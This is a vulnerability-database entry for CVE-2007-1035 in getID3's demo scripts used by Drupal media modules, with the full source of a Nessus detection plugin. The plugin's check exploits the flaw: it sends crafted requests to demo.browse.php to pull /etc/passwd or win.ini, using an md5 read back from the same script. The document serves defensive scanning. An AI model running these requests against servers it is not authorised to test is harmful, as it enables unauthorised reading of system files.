Vulnerabilities > CVE-2007-1035 - Remote Command Execution vulnerability in Drupal Audio And MediaField Modules GetID3

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
drupal
nessus

Summary

Unspecified vulnerability in certain demonstration scripts in getID3 1.7.1, as used in the Mediafield and Audio modules for Drupal, allows remote attackers to read and delete arbitrary files, list arbitrary directories, and write to empty files or .mp3 files via unknown vectors. This vulnerability affects the following versions of the Drupal Mediafield Module: 4.7.x-1.x-dev and 5.x-1.x-dev. It affects the following versions of the Drupal Audio Module: 4.7.x-1.x-dev, 5.x-0.2 and 5.x-0.x-dev.

Vulnerable Configurations

Part Description Count
Application
Drupal
3

Nessus

NASL family: CGI abuses
NASL id: GETID3_178.NASL
description: getID3, a web-based tool for extracting information from MP3 files, is installed on the remote web server. The installation of getID3 includes a set of demo scripts that allow an unauthenticated, remote attacker to read and delete arbitrary files, write files with some restrictions, and execute arbitrary code, all subject to the privileges under which the web server runs. Note that getID3 may be installed in support of another application, such as the Drupal Audio or Mediafield modules.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 24746
published: 2007-03-01
reporter: This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/24746
title: getID3 < 1.7.8-b1 Multiple Remote Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration section. When the scanner loads the plugin with
# `description` set, only the metadata below is recorded; the exit(0)
# at the end guarantees nothing further runs in that mode.
if (description)
{
  script_id(24746);
  script_version("1.21");
  script_cvs_date("Date: 2018/11/28 22:47:41");

  # External identifiers of the flaw this plugin checks for.
  script_cve_id("CVE-2007-1035");
  script_bugtraq_id(22587);

  script_name(english:"getID3 < 1.7.8-b1 Multiple Remote Vulnerabilities");
  script_summary(english:"Attempts to read a file with getID3's demo.browse.php.");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"getID3, a web-based tool for extracting information from MP3 files, is
installed on the remote web server.

The installation of getID3 includes a set of demo scripts that allow
an unauthenticated, remote attacker to read and delete arbitrary
files, write files with some restrictions, and execute arbitrary code,
all subject to the privileges under which the web server runs.

Note that getID3 may be installed in support of another application,
such as the Drupal Audio or Mediafield modules." );
  script_set_attribute(attribute:"see_also", value:"https://www.drupal.org/node/119385" );
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e0625253" );
  # Mitigation: removing the unused 'demos' directory is sufficient on
  # its own; upgrading is the alternative.
  script_set_attribute(attribute:"solution", value:
"Either remove the getID3 'demos' directory or upgrade to getID3
version 1.7.8b1 or later.");
  # Risk scoring: CVSS2 base vector (network, low complexity, no
  # authentication, partial C/I/A) and a temporal vector.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"plugin_publication_date", value: "2007/03/01");
  script_set_attribute(attribute:"vuln_publication_date", value: "2007/02/17");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:drupal");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:audio_module");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:getid3");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:mediafield_module");
  # Must follow every script_set_attribute() call above.
  script_end_attributes();

  # ACT_ATTACK: the check body actively exercises the file-read flaw
  # (see script_summary) rather than only comparing a version string.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # drupal_detect.nasl supplies the Drupal install paths used to build
  # the directory list in the scan body. The plugin is skipped when CGI
  # scanning is disabled and requires a web port on which PHP was seen.
  script_dependencies("http_version.nasl","os_fingerprint.nasl", "drupal_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

# Web port to test (php:TRUE — presumably limits the choice to a port
# on which PHP was detected; confirm against http.inc).
port = get_http_port(default:80, embedded:FALSE, php:TRUE);

# Candidate directories: the generic CGI directories, plus the
# well-known "/getid3" path when thorough tests are enabled.
dirs = make_list(cgi_dirs());
if (thorough_tests) dirs = list_uniq(make_list("/getid3", dirs));

# Add the getID3 location inside each detected Drupal install
# (modules/audio/getid3). exit_if_zero:FALSE keeps the plugin running
# when no Drupal install was found, since getID3 may be standalone.
app = "Drupal";
get_install_count(app_name:app, exit_if_zero:FALSE);

drupal_installs = get_installs(app_name:app, port:port);
# NOTE(review): index 1 appears to hold the list of install records —
# confirm against install_func.inc.
drupal_list = drupal_installs[1];
if (!isnull(drupal_list))
{
  foreach drupal_install (drupal_list)
  {
    module_dir = drupal_install['path'] + "/modules/audio/getid3";
    dirs = make_list(module_dir, dirs);
  }
}

# Choose which files to read back. With a fingerprinted OS (and report
# paranoia below 2) only the matching set is tried; otherwise all of
# them are.
os = get_kb_item("Host/OS");
unix_files = make_list('etc/passwd');
win_files = make_list('windows/win.ini', 'winnt/win.ini');

if (os && report_paranoia < 2)
{
  if ("Windows" >< os) files = win_files;
  else files = unix_files;
}
else files = make_list(unix_files, win_files);

# Per-file regex that confirms the returned body is the file itself
# and not an error page.
file_pats = make_array(
  'etc/passwd',      "root:.*:0:[01]:",
  'winnt/win.ini',   "^\[[a-zA-Z]+\]|^; for 16-bit app support",
  'windows/win.ini', "^\[[a-zA-Z]+\]|^; for 16-bit app support"
);

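vuln = FALSE;
non_vuln = make_list();

# The demo script under test. A GET with "filename=" returns the
# file's metadata (which includes its md5), and a GET with "showfile="
# plus that md5 returns the file body. Both steps are tried for every
# candidate directory and file.
url = "/demos/demo.browse.php";

foreach dir (dirs)
{
  # Full URL of this candidate; used for both reported requests so
  # the evidence list is uniformly formatted.
  install = build_url(qs:dir, port:port);
  foreach file (files)
  {
    # Step 1: fetch the metadata to obtain the md5 of the target file.
    w = http_send_recv3(method:"GET",
      item: dir + url + "?" +"filename=/" +file,
      port:port,
      exit_on_fail:TRUE
    );
    res = w[2];
    attack_req1 = install + url + "?" +"filename=/" +file;

    md5 = NULL;
    if ("<b>md5_file</b>" >< res)
    {
      # The md5 sits in the table cell after the "md5_file" label.
      pat = '<b>md5_file</b></td><td valign="top">string&nbsp;\\(32\\)</td><td>([^<]+)</td>';
      matches = egrep(pattern:pat, string:res);
      if (matches)
      {
        foreach match (split(matches))
        {
          match = chomp(match);
          m = eregmatch(pattern:pat, string:match);
          if (!isnull(m))
          {
            md5 = m[1];
            break;
          }
        }
      }
    }

    # Without an md5 this directory does not serve the demo (or the
    # file is not readable there); try the next file/directory.
    if (md5)
    {
      # Step 2: request the file body using the md5 obtained above.
      w = http_send_recv3(method:"GET",
        item: dir + url + "?" + "showfile=/" + file + "&" + "md5=" + md5,
        port:port,
        exit_on_fail:TRUE
      );
      res = w[2];

      # Content matching the expected pattern confirms the read.
      if (egrep(pattern:file_pats[file], string:res))
      {
        # Built from the full URL like attack_req1, so both entries in
        # the report's request list have the same form (previously this
        # one used the bare path).
        attack_req2 = install + url + "?" + "showfile=/" + file + "&" + "md5=" + md5;
        vuln = TRUE;
        break;
      }
      # The demo answered but did not return the file: remember the
      # install as present but not affected.
      else non_vuln = list_uniq(make_list(non_vuln, install));
    }
  }
  if (vuln) break;
}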

if (!vuln)
{
  # No confirmed read. Report according to how many installs answered
  # the demo script without handing the file back; every branch exits.
  n_seen = max_index(non_vuln);
  if (n_seen == 0) audit(AUDIT_WEB_APP_NOT_INST, 'getID3', port);
  else if (n_seen == 1) audit(AUDIT_WEB_APP_NOT_AFFECTED, 'getID3', non_vuln[0]);
  else exit(0, "None of the getID3 installs (" + join(non_vuln, sep:" & ") + ") are affected.");
}

# Confirmed read: both requests and the retrieved file body are
# attached to the finding as plain-text evidence.
security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  file        : file,
  request     : make_list(attack_req1, attack_req2),
  output      : chomp(res),
  attach_type : 'text/plain'
);
exit(0);